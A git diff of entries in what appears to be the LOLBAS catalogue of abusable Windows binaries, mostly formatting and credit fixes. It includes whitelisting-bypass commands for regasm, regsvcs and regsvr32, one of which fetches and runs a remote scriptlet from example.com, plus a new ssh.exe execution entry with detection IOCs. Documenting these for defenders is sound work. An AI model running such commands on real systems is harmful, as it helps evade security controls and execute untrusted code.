Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Leon Rodenko
Handle: '@L3m0nada'
---

View File

@ -24,4 +24,3 @@ Resources:
Acknowledgement:
- Person: FireEye
Handle: '@FireEye'
---

View File

@ -41,4 +41,3 @@ Resources:
Acknowledgement:
- Person: Grzegorz Tworek
Handle: '@0gtweet'
---

View File

@ -36,4 +36,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -7,7 +7,7 @@ Commands:
- Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
@ -38,4 +38,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -31,4 +31,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Eli Salem
Handle: '@elisalem9'
---

View File

@ -24,4 +24,3 @@ Resources:
Acknowledgement:
- Person: Philip Tsukerman
Handle: '@PhilipTsukerman'
---

View File

@ -14,8 +14,8 @@ Commands:
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: AWL bypass
Privileges: User
Category: AWL Bypass
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -7,14 +7,14 @@ Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: AWL bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
@ -57,4 +57,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
---

View File

@ -32,4 +32,3 @@ Resources:
Acknowledgement:
- Person: elceef
Handle: '@elceef'
---

View File

@ -39,4 +39,3 @@ Acknowledgement:
Handle: '@splinter_code'
- Person: ap
Handle: '@decoder_it'
---

View File

@ -80,6 +80,7 @@ Resources:
- Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md
- Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
- Link: https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90
- Link: https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
@ -91,4 +92,3 @@ Acknowledgement:
Handle: '@404death'
- Person: Martin Ingesen
Handle: '@Mrtn9'
---

View File

@ -1,6 +1,6 @@
---
Name: Runonce.exe
Description:
Description: Executes a Run Once Task that has been configured in the registry
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -27,4 +27,3 @@ Resources:
Acknowledgement:
- Person: Pierre-Alexandre Braeken
Handle: '@pabraeken'
---

View File

@ -1,6 +1,6 @@
---
Name: Runscripthelper.exe
Description:
Description: Execute target PowerShell script
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -26,4 +26,3 @@ Resources:
Acknowledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
---

View File

@ -36,4 +36,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -33,4 +33,3 @@ Resources:
Acknowledgement:
- Person:
Handle:
---

View File

@ -1,6 +1,6 @@
---
Name: Scriptrunner.exe
Description:
Description: Execute binary through proxy binary to evade defensive counter measures
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@ -33,4 +33,3 @@ Resources:
Acknowledgement:
- Person: Nick Tyrer
Handle: '@nicktyrer'
---

View File

@ -31,4 +31,3 @@ Acknowledgement:
Handle: '@hexacorn'
- Person: Elliot Killick
Handle: '@elliotkillick'
---

27
yml/OSBinaries/Ssh.yml Normal file
View File

@ -0,0 +1,27 @@
---
Name: ssh.exe
Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.
Author: 'Akshat Pradhan'
Created: '2021-11-08'
Commands:
- Command: ssh localhost calc.exe
Description: Execute calc.exe on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.
Usecase: Execute specified command, can be used for defense evasion.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10 1809, Windows Server 2019
- Command: ssh localhost calc.exe
Description: Executes calc.exe.
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
Category: AWL Bypass
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 1809, Windows Server 2019
Full_Path:
- Path: c:\windows\system32\OpenSSH\ssh.exe
Detection:
- IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe.
- IOC: command line arguments specifying execution.
Acknowledgement:
- Person: Akshat Pradhan

View File

@ -22,4 +22,3 @@ Resources:
Acknowledgement:
- Person: Eral4m
Handle: '@eral4m'
---

Some files were not shown because too many files have changed in this diff Show More